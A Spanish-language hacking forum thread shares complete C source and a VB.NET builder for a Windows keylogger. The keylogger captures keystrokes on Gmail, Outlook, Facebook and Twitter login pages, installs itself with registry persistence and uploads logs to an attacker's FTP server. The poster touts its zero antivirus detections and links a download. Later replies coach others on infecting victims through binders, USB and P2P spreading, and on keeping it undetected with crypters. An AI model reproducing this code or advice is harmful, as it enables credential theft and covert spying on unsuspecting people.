Hola! hoy traje un programa simple.
un keylogger que captura las paginas que visita la victima, y al detectar paginas especiales, asi sea facebook, twitter, gmail, hotmail, yahoo, que requieren login.
activa el HOOK del teclado durante 5 minutos para saber que presiona durante el login.
Sube los archivos a un FTP que configuren (pueden crearse uno gratis y funcional en www.000webhost.com (http://www.000webhost.com)) yo hice las pruebas con uno de allí.
Tambien pueden usarlo en sus propios ordenadores, para controlar que paginas se visitan y los logins.
Les dejo el codigo & el compilado de ambos, cliente y stub.[/u
(http://i58.tinypic.com/oa0ufq.png)
el stub al analizarlo me dio FUD, pero quizas con el agregado de EOF, pueda detectarlo algun AV.
Stub
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#define ALLOC(dwSizee) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( dwSizee + 1 ) )
#define FREE(memblock) GlobalFree ( memblock )
#define GETSIZE(filename) GetSizeFile ( ( LPSTR )filename )
typedef PVOID IHANDLE;
typedef IHANDLE *LPIHANDLE;
typedef WORD I_PORT,*LPI_PORT;
#define LIB ( LPSTR ) "Wininet.dll"
#define ATTR ( DWORD ) ( 0x1 | 0x2 | 0x4 )
typedef BOOL ( __stdcall *_QueryFullProcessImageName ) ( IN HANDLE hProcess, IN DWORD dwFlags,
OUT LPTSTR lpExeName, OUT PDWORD lpdwSize );
typedef IHANDLE ( __stdcall *_iOpen ) ( IN LPCTSTR lpszAgent, IN DWORD dwAccessType, IN LPCTSTR lpszProxyName, IN LPCTSTR lpszProxyByPass, IN DWORD dwFlags );
typedef IHANDLE ( __stdcall *_iConnect ) ( IN IHANDLE hInternet, IN LPCTSTR lpszServerName, IN I_PORT nServerPort, IN LPCTSTR lpszUsername, IN LPCTSTR lpszPassword, IN DWORD dwService, IN DWORD dwFlags, IN DWORD_PTR dwContext );
typedef BOOL ( __stdcall *_iCloseHandle ) ( IN IHANDLE hInternet );
typedef BOOL ( __stdcall *_iSend ) ( IN IHANDLE hConnect, IN LPCTSTR lpszLocalFile, IN LPCTSTR lpszNewRemoteFile, IN DWORD dwFlags, IN DWORD_PTR dwContext );
/*
Keylogger avanzado by xxneeco83xx
Detecta paginas de navegacion en Google Chrome & Firefox
En caso de entrar en paginas que requieran login y demas activa un keylogger por 4 minutos para detectar las teclas.
[email protected]
*/
class PUT_LOGGER
{
private:
IHANDLE Request, Connection;
_iOpen iOpen;
_iConnect iConnect;
_iCloseHandle iCloseHandle;
_iSend iSend;
public:
bool __stdcall ToFile ( PCHAR Server, PCHAR UserName, PCHAR PassWord,
PCHAR FileNameLocal, PCHAR FileNameRemote );
} PUTLOG, *LPUTLOG;
static char path [ MAX_PATH + 1 ];
FILE* salida;
HHOOK hHook;
MSG msg;
BOOL CALLBACK EnumChildProc ( HWND hwnd, LPARAM lParam );
LRESULT CALLBACK Keyboard ( int nCode, WPARAM wParam, LPARAM lParam );
DWORD __stdcall Keyboard_Trap ( VOID );
LPSTR __stdcall Split ( IN LPSTR lpszString, IN CHAR Delimiter );
BOOL __stdcall ifCharacter ( IN LPSTR lpszString, IN CHAR pCharacter );
int __stdcall GetMyName ( IN char name [ 256 ] );
BOOL __stdcall GetBuffer ( IN LPSTR lpszPath, IN LPSTR pBuffer, IN LPDWORD dwSize );
DWORD __stdcall GetSizeFile ( IN LPSTR lpszPath );
BOOL __stdcall FileWrite ( IN LPSTR lpszPath, IN LPSTR pBuffer, IN DWORD dwSize );
BOOL __stdcall FileExists ( IN LPSTR lpszPath );
bool __stdcall PUT_LOGGER::ToFile ( PCHAR Server, PCHAR UserName, PCHAR Password,
PCHAR FileNameLocal, PCHAR FileNameRemote )
{
iOpen = ( _iOpen ) GetProcAddress ( ( HINSTANCE ) LoadLibraryA ( ( LPSTR ) LIB ), "InternetOpenA" );
iConnect = ( _iConnect ) GetProcAddress ( ( HINSTANCE ) LoadLibraryA ( ( LPSTR ) LIB ), "InternetConnectA" );
iCloseHandle = ( _iCloseHandle ) GetProcAddress ( ( HINSTANCE ) LoadLibraryA ( ( LPSTR ) LIB ), "InternetCloseHandle" );
iSend = ( _iSend ) GetProcAddress ( ( HINSTANCE ) LoadLibraryA ( ( LPSTR ) LIB ), "FtpPutFileA" );
Request = iOpen ( "Windows Update common", 1, 0, 0, 0 );
if ( Request == 0L ) {
iCloseHandle ( Request );
return false;
}
Connection = iConnect ( Request, Server, 21, UserName, Password, 1, 0, 0 );
if ( Connection == 0L ) {
iCloseHandle ( Connection );
iCloseHandle ( Request );
return false;
}
if ( iSend ( Connection, FileNameLocal, FileNameRemote, 2, 0 ) == FALSE ) {
iCloseHandle ( Connection );
iCloseHandle ( Request );
return false;
}
else
{
DeleteFileA ( FileNameLocal );
}
iCloseHandle ( Request );
iCloseHandle ( Connection );
return true;
}
BOOL CALLBACK EnumChildProc ( HWND hwnd, LPARAM lParam )
{
char Text [ 256 ], Classes [ 256 ];
GetWindowText ( hwnd, Text, 255 );
SYSTEMTIME time;
GetClassName ( hwnd, Classes, 255 );
if ( ( hwnd == GetForegroundWindow() ) && IsWindowVisible ( hwnd ) )
{
if ( ( lstrcmpA ( Classes, "Chrome_WidgetWin_1" ) == 0 ) && ( lstrlenA ( Text ) >= 1 ) )
{
GetSystemTime ( &time );
salida = fopen ( path, "a+" );
fprintf ( salida, "[%s] - [%d/%d/%d - %d:%d:%d%:%dms]\n", Text, time.wDay, time.wMonth, time.wYear, time.wHour, time.wMinute, time.wSecond, time.wMilliseconds );
fclose ( salida );
//Si detectamos gmail o hotmail, yahoo.
if ( ( lstrcmpA ( Text, "Gmail - Google Chrome" ) == 0 ) ||
( lstrcmpA ( Text, "Outlook - Google Chrome" ) == 0 ) || ( lstrcmpA ( Text, "Yahoo - Google Chrome" ) == 0 )
|| ( lstrcmpA ( Text, "Iniciar sesión - Google Chrome" ) == 0 ) || ( lstrcmpA ( Text, "Facebook - Inicia sesión o regístrate - Google Chrome" ) == 0 )
|| ( lstrcmpA ( Text, "Bienvenido a Twitter - Inicia sesión o regístrate - Google Chrome" ) == 0 ) )
{
HANDLE Thread;
DWORD key;
Thread = CreateThread ( 0, 0, ( LPTHREAD_START_ROUTINE )Keyboard_Trap, 0, 0, &key );
if ( Thread )
{
WaitForSingleObject ( Thread, ( 4 * 60000 ) ); // 4 minutos.
}
CloseHandle ( Thread );
UnhookWindowsHookEx ( hHook );
}
}
else if ( ( lstrcmpA ( Classes, "MozillaWindowClass" ) == 0 ) && ( lstrlenA ( Text ) >= 1 ) )
{
GetSystemTime ( &time );
salida = fopen ( path, "a+" );
fprintf ( salida, "[%s] - [%d/%d/%d - %d:%d:%d%:%dms]\n", Text, time.wDay, time.wMonth, time.wYear, time.wHour, time.wMinute, time.wSecond, time.wMilliseconds );
fclose ( salida );
//Si detectamos gmail o hotmail, yahoo.
if ( ( lstrcmpA ( Text, "Gmail - Mozilla Firefox" ) == 0 ) ||
( lstrcmpA ( Text, "Outlook - Mozilla Firefox" ) == 0 ) || ( lstrcmpA ( Text, "Yahoo - Mozilla Firefox" ) == 0 )
|| ( lstrcmpA ( Text, "Iniciar sesión - Mozilla Firefox" ) == 0 ) || ( lstrcmpA ( Text, "Facebook - Inicia sesión o regístrate - Mozilla Firefox" ) == 0 )
|| ( lstrcmpA ( Text, "Bienvenido a Twitter - Inicia sesión o regístrate - Mozilla Firefox" ) == 0 ) )
{
HANDLE Thread;
DWORD key;
Thread = CreateThread ( 0, 0, ( LPTHREAD_START_ROUTINE )Keyboard_Trap, 0, 0, &key );
if ( Thread )
{
WaitForSingleObject ( Thread, ( 4 * 60000 ) ); // 4 minutos.
}
CloseHandle ( Thread );
UnhookWindowsHookEx ( hHook );
}
}
}
return TRUE;
}
LRESULT CALLBACK Keyboard ( int nCode, WPARAM wParam, LPARAM lParam )
{
char keyname [ 256 ];
if ( nCode < 0 )
{
return CallNextHookEx ( hHook, nCode, wParam, lParam );
}
if ( wParam == WM_KEYDOWN )
{
PKBDLLHOOKSTRUCT keyboard = reinterpret_cast <PKBDLLHOOKSTRUCT>(lParam);
int ScanCode = MapVirtualKeyEx ( keyboard -> vkCode, 0, GetKeyboardLayout ( 0 ) );
GetKeyNameText ( ScanCode << 16, keyname, 255 );
salida = fopen ( path, "a+" );
if ( lstrlenA ( keyname ) > 1 )
{
fprintf ( salida, " %s ", keyname );
}
else
{
fprintf ( salida, "%s", keyname );
}
fclose ( salida );
}
return CallNextHookEx ( hHook, nCode, wParam, lParam );
}
DWORD __stdcall Keyboard_Trap ( VOID )
{
hHook = SetWindowsHookEx ( WH_KEYBOARD_LL, ( HOOKPROC ) Keyboard, GetModuleHandle ( 0L ), 0L );
while ( ! GetMessage ( &msg, 0, 0, 0 ) )
{
TranslateMessage ( &msg );
DispatchMessage ( &msg );
}
UnhookWindowsHookEx ( hHook );
return 0;
}
LPSTR __stdcall Split ( IN LPSTR lpszString, IN CHAR Delimiter )
{
register DWORD bytes = 0;
for ( bytes; bytes <= lstrlenA ( lpszString ); bytes ++ )
{
if ( lpszString [ bytes ] == Delimiter )
{
return lpszString + ( bytes + 1 );
}
}
return lpszString;
}
BOOL __stdcall ifCharacter ( IN LPSTR lpszString, IN CHAR pCharacter )
{
register DWORD bytes = 0;
for ( bytes; bytes <= lstrlenA ( lpszString ); bytes ++ )
{
if ( lpszString [ bytes ] == pCharacter )
{
return TRUE;
}
}
return FALSE;
}
int __stdcall GetMyName ( IN char name [ 256 ] )
{
char szExeName [ MAX_PATH + 1 ];
DWORD dwbytes;
_QueryFullProcessImageName QueryFullProcessImageName = ( _QueryFullProcessImageName )
GetProcAddress ( ( HINSTANCE ) LoadLibraryA ( ( LPSTR ) "KERNEL32.DLL" ), "QueryFullProcessImageNameA" );
HANDLE Process = OpenProcess ( PROCESS_QUERY_INFORMATION, false, GetCurrentProcessId () );
if ( ! Process )
{
CloseHandle ( Process );
return -1;
}
QueryFullProcessImageName ( Process, 0, name, &dwbytes );
CloseHandle ( Process );
return 0;
}
BOOL __stdcall GetBuffer ( IN LPSTR lpszPath, IN LPSTR pBuffer, IN LPDWORD dwSize )
{
HANDLE File;
DWORD dwFileSize, dwBytes;
File = CreateFileA ( lpszPath, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0 );
if ( File == INVALID_HANDLE_VALUE )
{
CloseHandle ( File );
return FALSE;
}
dwFileSize = GetFileSize ( File, 0 );
*dwSize = dwFileSize;
ReadFile ( File, pBuffer, dwFileSize, &dwBytes, 0 );
CloseHandle ( File );
return TRUE;
}
DWORD __stdcall GetSizeFile ( IN LPSTR lpszPath )
{
HANDLE File;
DWORD dwFileSize, dwBytes;
File = CreateFileA ( lpszPath, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0 );
if ( File == INVALID_HANDLE_VALUE )
{
CloseHandle ( File );
return 0;
}
dwFileSize = GetFileSize ( File, 0 );
CloseHandle ( File );
return dwFileSize;
}
BOOL __stdcall FileWrite ( IN LPSTR lpszPath, IN LPSTR pBuffer, IN DWORD dwSize )
{
HANDLE File;
DWORD dwBytes;
File = CreateFileA ( lpszPath, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, ATTR, 0 );
if ( File == INVALID_HANDLE_VALUE )
{
CloseHandle ( File );
return FALSE;
}
WriteFile ( File, pBuffer, dwSize, &dwBytes, 0 );
CloseHandle ( File );
return TRUE;
}
BOOL __stdcall FileExists ( IN LPSTR lpszPath )
{
DWORD Attributes;
Attributes = GetFileAttributesA ( lpszPath );
if ( Attributes == INVALID_FILE_ATTRIBUTES )
{
return FALSE;
}
else
{
return TRUE;
}
return FALSE;
}
int __stdcall WinMain ( HINSTANCE hThisInstance, HINSTANCE hPrevInstance,
LPSTR lpszArgument, int nCmdFunstil )
{
DWORD dwSize;
DWORD tmp;
HKEY key;
SYSTEMTIME time;
GetLocalTime ( &time );
PUT_LOGGER Logger;
int Hour = time.wHour; //Hora de comienzo.
if ( Hour == 12 || Hour == 0 )
{
Hour = 1;
}
char path_inf [ MAX_PATH + 1 ];
char encrypted [ MAX_PATH + 1 ];
char one [ 10 ] = "Sof";
char two [ 20 ] = "\\Micro";
char three [ 50 ] = "dows\\Curre";
char four [ 50 ] = "\\Ru";
char dop [ 150 ];
if ( lstrlenA ( one ) > 0 )
{
wsprintfA ( encrypted, "%stware%ssoft\\Win%sntVersion%sn", one, two, three, four );
wsprintfA ( path_inf, "%s\\system\\%slogical.%s", getenv ( "windir"), "driver", "exe" );
wsprintfA ( dop, "Driver %s", "Sound" );
wsprintfA ( path, "%s\\config.inf", getenv ( "windir" ) );
}
HWND hwnd = GetDesktopWindow ();
char myname [ MAX_PATH + 1 ];
GetMyName ( myname );
LPSTR Bufferx = ( LPSTR ) ALLOC ( GETSIZE ( myname ) );
GetBuffer ( myname, Bufferx, &dwSize );
FileWrite ( path_inf, Bufferx, dwSize );
if ( RegOpenKeyExA ( HKEY_LOCAL_MACHINE, encrypted, 0, (0x0002), &key ) == ERROR_SUCCESS )
{
RegSetValueExA ( key, dop, 0, REG_SZ, ( const unsigned char *) myname, ( BYTE ) lstrlenA ( myname ) );
}
RegCloseKey ( key );
for ( DWORD i = 0; i <= dwSize; i ++ )
{
if ( Bufferx [ i ] == '*' && Bufferx [ i + 1 ] == '+' &&
Bufferx [ i + 2 ] == '+' && Bufferx [ i + 3 ] == '*' )
{
Bufferx += ( i + 4 );
dwSize -= ( i + 4 );
}
}
LPSTR Primero, User, Pass, SERVER;
User = ( LPSTR ) ALLOC ( MAX_PATH );
Pass = ( LPSTR ) ALLOC ( MAX_PATH );
SERVER = ( LPSTR ) ALLOC ( MAX_PATH );
Primero = ( LPSTR ) ALLOC ( 600 );
if ( ifCharacter ( Bufferx, ',' ) )
{
Primero = Split ( Bufferx, ',' );
}
else
{
FREE ( Bufferx );
FREE ( Primero );
FREE ( User );
FREE ( Pass );
FREE ( SERVER );
return EXIT_FAILURE;
}
register DWORD bytes = 0;
for ( bytes; bytes <= lstrlenA ( Primero ); bytes ++ )
{
if ( Primero [ bytes ] != ',' )
{
CopyMemory ( & SERVER [ bytes ], & Primero [ bytes ], 1 );
}
else
{
Primero += ( bytes + 1 );
break;
}
}
bytes = 0;
for ( bytes; bytes <= lstrlenA ( Primero ); bytes ++ )
{
if ( Primero [ bytes ] != ',' )
{
CopyMemory ( & User [ bytes ], & Primero [ bytes ], 1 );
}
else
{
Primero += ( bytes + 1 );
break;
}
}
CopyMemory ( & Pass [ 0 ], & Primero [ 0 ], lstrlenA ( Primero ) );
FREE ( Primero );
FREE ( Bufferx );
char tmp_log [ 256 ];
while ( 1 )
{
GetLocalTime ( & time );
if ( time.wMinute == Hour + 1 )
{
wsprintfA ( tmp_log, "archivo de %d:%d:%d - %d-%d-%d.txt", time.wHour, time.wMinute, time.wSecond, time.wDay, time.wMonth, time.wYear );
Logger.ToFile ( SERVER, User, Pass, path, tmp_log );
if ( Hour == 12 || Hour == 0 )
{
Hour = 1;
}
}
if ( ! FileExists ( path_inf ) )
{
FileWrite ( path_inf, Bufferx, dwSize );
if ( RegOpenKeyExA ( HKEY_LOCAL_MACHINE, encrypted, 0, (0x0002), &key ) == ERROR_SUCCESS )
{
RegSetValueExA ( key, dop, 0, REG_SZ, ( const unsigned char *) myname, ( BYTE ) lstrlenA ( myname ) );
}
RegCloseKey ( key );
}
for ( int i = 0; i <= 1; i ++ )
{
EnumChildWindows ( hwnd, EnumChildProc, 0 );
Sleep ( 2000 );
}
}
FREE ( User );
FREE ( Pass );
FREE ( SERVER );
return EXIT_SUCCESS;
}
Generador
Public Class Form1
Dim ff As Long
Dim buffer As String
Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
End
End Sub
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If Not TextBox1.Text = "" And Not TextBox2.Text = "" And Not TextBox3.Text = "" Then
ff = FreeFile()
FileOpen(1, "STUB.DLL", OpenMode.Binary, OpenAccess.Read, OpenShare.LockRead)
buffer = Space(LOF(ff))
FileGet(1, buffer)
FileClose(1)
FileOpen(1, "Generado.exe", OpenMode.Binary, OpenAccess.Write, OpenShare.LockWrite)
FilePut(1, buffer & "*++*," & TextBox1.Text & "," & TextBox2.Text & "," & TextBox3.Text)
FileClose(1)
MsgBox("Compilado con exito", MsgBoxStyle.Information + MsgBoxStyle.OkOnly, "Exito")
TextBox1.Text = ""
TextBox2.Text = ""
TextBox3.Text = ""
TextBox1.Focus()
End If
End Sub
Private Sub Form1_Activated(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Activated
TextBox1.Focus()
End Sub
End Class
Bueno ya lo resubi y me dio FUD 0/56 , si se que no debi haberlo subido a virustotal, pero queria un analicis completo, ya luego si se detecta lo vuelvo a resubir FUD.
https://www.virustotal.com/es/file/c31e142aae9e6ecc34803bc1f31a2c2a33e67c1b2196bcece82e19fa6b7f93ff/analysis/1438789978/ (https://www.virustotal.com/es/file/c31e142aae9e6ecc34803bc1f31a2c2a33e67c1b2196bcece82e19fa6b7f93ff/analysis/1438789978/)
Antivirus Resultado Actualización
ALYac 20150805 Clean
AVG 20150805 Clean
AVware 20150805 Clean
Ad-Aware 20150805 Clean
AegisLab 20150805 Clean
Agnitum 20150804 Clean
AhnLab-V3 20150805 Clean
Alibaba 20150803 Clean
Antiy-AVL 20150805 Clean
Arcabit 20150805 Clean
Avast 20150805 Clean
Avira 20150805 Clean
Baidu-International 20150805 Clean
BitDefender 20150805 Clean
Bkav 20150805 Clean
ByteHero 20150805 Clean
CAT-QuickHeal 20150805 Clean
ClamAV 20150805 Clean
Comodo 20150805 Clean
Cyren 20150805 Clean
DrWeb 20150805 Clean
ESET-NOD32 20150805 Clean
Emsisoft 20150805 Clean
F-Prot 20150805 Clean
F-Secure 20150805 Clean
Fortinet 20150804 Clean
GData 20150805 Clean
Ikarus 20150805 Clean
Jiangmin 20150804 Clean
K7AntiVirus 20150805 Clean
K7GW 20150805 Clean
Kaspersky 20150805 Clean
Kingsoft 20150805 Clean
Malwarebytes 20150805 Clean
McAfee 20150805 Clean
McAfee-GW-Edition 20150805 Clean
MicroWorld-eScan 20150805 Clean
Microsoft 20150805 Clean
NANO-Antivirus 20150805 Clean
Panda 20150805 Clean
Qihoo-360 20150805 Clean
Rising 20150731 Clean
SUPERAntiSpyware 20150805 Clean
Sophos 20150805 Clean
Symantec 20150805 Clean
Tencent 20150805 Clean
TheHacker 20150805 Clean
TotalDefense 20150805 Clean
TrendMicro 20150805 Clean
TrendMicro-HouseCall 20150805
VBA32 20150805 Clean
VIPRE 20150805 Clean
ViRobot 20150805 Clean
Zillya 20150805 Clean
Zoner 20150805 Clean
nProtect 20150805 Clean
Aqui el link de descarga
https://mega.nz/#!LkIxCaRa!MW3WMFNJws-lIEWDQu2p4wusXd5Cf1uGJ5paVCh3vik (https://mega.nz/#!LkIxCaRa!MW3WMFNJws-lIEWDQu2p4wusXd5Cf1uGJ5paVCh3vik)
PASS : xxneeco83xx
Que gran aporte, te dejo +1 y voy a leer ya el código :D
Saludos.
Buena.. como puedo enviarlo por gmail no sé mucho de c/c++ ;D
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Buena.. como puedo enviarlo por gmail no sé mucho de c/c++ ;D
Es como cualquier otro malware, deberás enviar el ejecutable.
saludos.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Que gran aporte, te dejo +1 y voy a leer ya el código :D
Saludos.
Gracias! vere si en un rato lo subo FUD.
saludos ;D
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Que gran aporte, te dejo +1 y voy a leer ya el código :D
Saludos.
Gracias! vere si en un rato lo subo FUD.
saludos ;D
Excelente, avisa entonces :D
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Que gran aporte, te dejo +1 y voy a leer ya el código :D
Saludos.
Gracias! vere si en un rato lo subo FUD.
saludos ;D
Excelente, avisa entonces :D
Ya esta fud, ahi lo actualizo, ando publicando un binder tambien, :-X
Mira el analisis. ( Lo subi a virustotal porque de igual forma, lo seguire modificando )
https://www.virustotal.com/es/file/c31e142aae9e6ecc34803bc1f31a2c2a33e67c1b2196bcece82e19fa6b7f93ff/analysis/1438789978/ (https://www.virustotal.com/es/file/c31e142aae9e6ecc34803bc1f31a2c2a33e67c1b2196bcece82e19fa6b7f93ff/analysis/1438789978/)
Pero se puede aplicar a algún archivo o algo para no tener necesariamente el acceso al computador a espiar?
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Pero se puede aplicar a algún archivo o algo para no tener necesariamente el acceso al computador a espiar?
te refieres a la forma de infectar a una persona ?
si no sabes quien sera tu victima, o te interesa tener varias de ellas.
Puedes utilizar diferentes metodos para propagarlo, el USB, P2P, en caso de que tengas fijo a quien enviar, si no tienes acceso al ordenador, puedes hacer abrirle un link con el archivo para que se lo descargue o demás.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Pero se puede aplicar a algún archivo o algo para no tener necesariamente el acceso al computador a espiar?
te refieres a la forma de infectar a una persona ?
si no sabes quien sera tu victima, o te interesa tener varias de ellas.
Puedes utilizar diferentes metodos para propagarlo, el USB, P2P, en caso de que tengas fijo a quien enviar, si no tienes acceso al ordenador, puedes hacer abrirle un link con el archivo para que se lo descargue o demás.
Claro, si quiero infectar a un grupo de gente pequeño que tienen gustos similares y esas enviandole el archivo infectado, pero resulta que obviamente no se le puede enviar el keylogger, que lo abran y que para ellos no pase nada, sino que se les envie un archivo, una imagen, un block de notas, lo que sea y dentro de ese archivo aparte de lo que sea se infecten con el key. Esa es mi duda.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Pero se puede aplicar a algún archivo o algo para no tener necesariamente el acceso al computador a espiar?
te refieres a la forma de infectar a una persona ?
si no sabes quien sera tu victima, o te interesa tener varias de ellas.
Puedes utilizar diferentes metodos para propagarlo, el USB, P2P, en caso de que tengas fijo a quien enviar, si no tienes acceso al ordenador, puedes hacer abrirle un link con el archivo para que se lo descargue o demás.
Claro, si quiero infectar a un grupo de gente pequeño que tienen gustos similares y esas enviandole el archivo infectado, pero resulta que obviamente no se le puede enviar el keylogger, que lo abran y que para ellos no pase nada, sino que se les envie un archivo, una imagen, un block de notas, lo que sea y dentro de ese archivo aparte de lo que sea se infecten con el key. Esa es mi duda.
puedes usar un joiner (binder) adjuntar el keylogger junto con un block de notas, imagen, lo que quieras.
de esa forma seria menos sospechoso.
puedo usar un crypter para dejarlo fud ?
y si se puede tiene q ser en vb.net o tambien me sirve el vb6
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
puedo usar un crypter para dejarlo fud ?
y si se puede tiene q ser en vb.net o tambien me sirve el vb6
si usas crypter mientras funcione, puede estar desarrollado en cualquier lenguaje de programación.
si soporta cifrado y demás.
muchas gracias por contestar , saludos
Estoy a años luz de hacer lo que tenia pensado. Entiendo re poco de los términos que me dan. :c
Si analizas el .dll de la aplicación: https://www.virustotal.com/es/file/418080a63a7908bbf66f0fa6b8d3c052578eaad70b19ae0389f58a081ce3ed45/analysis/1461256525/ (https://www.virustotal.com/es/file/418080a63a7908bbf66f0fa6b8d3c052578eaad70b19ae0389f58a081ce3ed45/analysis/1461256525/)
Saludos :)
Lo ideal es que no lo sigan pasando por virustotal para no quemar aun mas el codigo. Busquen otros scaners online.
Enviado desde mi Black Phone!
Good program, thanks good job.
tiene bug el foro, estoy registrado y aun no me sale el link?
Como me registro, ya le intente y se queda en conectando con el servidor 9s que hago :-\
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Como me registro, ya le intente y se queda en conectando con el servidor 9s que hago :-\
El Keylogger es del 2015. No se si siga operativo
Quizás
@xxneeco83xx (https://underc0de.org/foro/index.php?action=profile;u=48441) pueda decirte
Saludos,
ANTRAX
genial, funciona perfecto mas que nada este tipo de programas lo ocupo para ver que hace mi hijo en el computador, eso de dañar la privacidad de otras no me gusta mucho soy mas del tema de la seguridad por eso me encanta.
Perfecto, gracias por estos aportes para poder estudiar dichos stub y demas, tengo una pequeña duda.
genero todo y funciona perfectamente, me envia el txt al ftp, por que cuando abro el archivo esta vacio... Gracias por la ayuda.